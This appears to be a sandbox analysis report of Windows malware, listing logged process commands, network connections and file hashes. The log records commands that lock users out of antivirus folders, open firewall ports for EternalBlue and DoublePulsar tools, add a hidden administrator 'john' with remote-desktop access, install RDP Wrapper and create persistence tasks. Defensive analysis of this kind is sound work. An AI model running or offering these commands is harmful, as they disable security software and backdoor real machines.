netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\sc.exe
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\sc.exe
sc config RManService obj= LocalSystem type= interact type= own
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\sc.exe
sc config RManService DisplayName= "Microsoft Framework"
C:\ProgramData\Microsoft\Intel\winlog.exe
C:\ProgramData\Microsoft\Intel\winlog.exe -p123
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
C:\ProgramData\Microsoft\Intel\winlogon.exe
"C:\ProgramData\Microsoft\Intel\winlogon.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4769.tmp\476A.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
C:\Programdata\WindowsTask\winlogon.exe
C:\Programdata\WindowsTask\winlogon.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /query /fo list
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\schtasks.exe
schtasks /query /fo list
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administratorzy" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Uzytkownicy pulpitu zdalnego" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 5 /NOBREAK
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gpupdate /force
C:\Windows\system32\gpupdate.exe
gpupdate /force
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\net.exe
net accounts /maxpwage:unlimited
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM 1.exe /T /F
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM P.exe /T /F
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
Network
| Country | Destination | Domain | Proto |
| NL | 20.190.160.67:443 | | tcp |
| NL | 20.190.160.67:443 | | tcp |
| NL | 20.190.160.67:443 | | tcp |
| US | 8.8.8.8:53 | boglogov.site | udp |
| US | 8.8.8.8:53 | boglogov.site | udp |
| NL | 20.190.160.8:443 | | tcp |
| NL | 20.190.160.8:443 | | tcp |
| NL | 20.190.160.8:443 | | tcp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 52.182.143.208:443 | | tcp |
| US | 8.8.8.8:53 | freemail.freehost.com.ua | udp |
| UA | 194.0.200.251:465 | freemail.freehost.com.ua | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| NL | 20.190.160.2:443 | | tcp |
| NL | 20.190.160.2:443 | | tcp |
| NL | 20.190.160.2:443 | | tcp |
| US | 8.8.8.8:53 | taskhostw.com | udp |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | taskhostw.com | udp |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| RU | 109.248.203.81:21 | | tcp |
| NL | 178.79.208.1:80 | | tcp |
| NL | 178.79.208.1:80 | | tcp |
| NL | 178.79.208.1:80 | | tcp |
| NL | 20.190.160.136:443 | | tcp |
| NL | 20.190.160.136:443 | | tcp |
| NL | 20.190.160.136:443 | | tcp |
| NL | 104.110.191.133:80 | | tcp |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| NL | 20.190.160.73:443 | | tcp |
| NL | 20.190.160.73:443 | | tcp |
| NL | 20.190.160.73:443 | | tcp |
| NL | 20.190.160.71:443 | | tcp |
| NL | 20.190.160.71:443 | | tcp |
| NL | 20.190.160.71:443 | | tcp |
Files
C:\ProgramData\Microsoft\Intel\wini.exe
| MD5 | f9a9b17c831721033458d59bf69f45b6 |
| SHA1 | 472313a8a15aca343cf669cfc61a9ae65279e06b |
| SHA256 | 9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce |
| SHA512 | 653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8 |
C:\ProgramData\install\cheat.exe
| MD5 | c097289ee1c20ac1fbddb21378f70410 |
| SHA1 | d16091bfb972d966130dc8d3a6c235f427410d7f |
| SHA256 | b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2 |
